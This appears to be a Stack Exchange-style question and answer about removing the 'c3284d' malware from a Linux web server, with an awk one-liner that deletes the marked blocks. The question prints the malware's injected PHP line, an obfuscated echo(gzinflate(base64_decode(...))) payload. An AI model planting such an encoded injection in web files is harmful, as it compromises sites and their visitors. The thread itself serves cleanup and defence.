linux - Clean server infected with c3284d virus, using search and replace

Question

I'm having an issue with the Notorious c3284d virus. It modifies pretty much all the html/php/js files it can find.

I've changed all the passwords and users on the server, so if it's a compromised account it should have solved that issue, but I'm still struggling with removing it altogether.

I was able to find it all the infected files using a simple sudo grep -R "#c3284d#" /home command.

But I need a quick way to search and replace it.

The virus signature is this line:

"#c3284d#" echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw=="))); "#/c3284d#"

When the echo line can change and vary, but it will always start with #c32..# and finish with #/c3....#.

I just want to replace it with nothing.

Answer 1

awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#/c3284d#") == 0) { print $0 } }' dirty-file > clean-file

That's a mouthful but it does the trick:

$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#/c3284d#") == 0) { print $0 } }'
> foo
> #c3284d#
> bar
> baz
> #/c3284d#
> quux
> EOF
foo
quux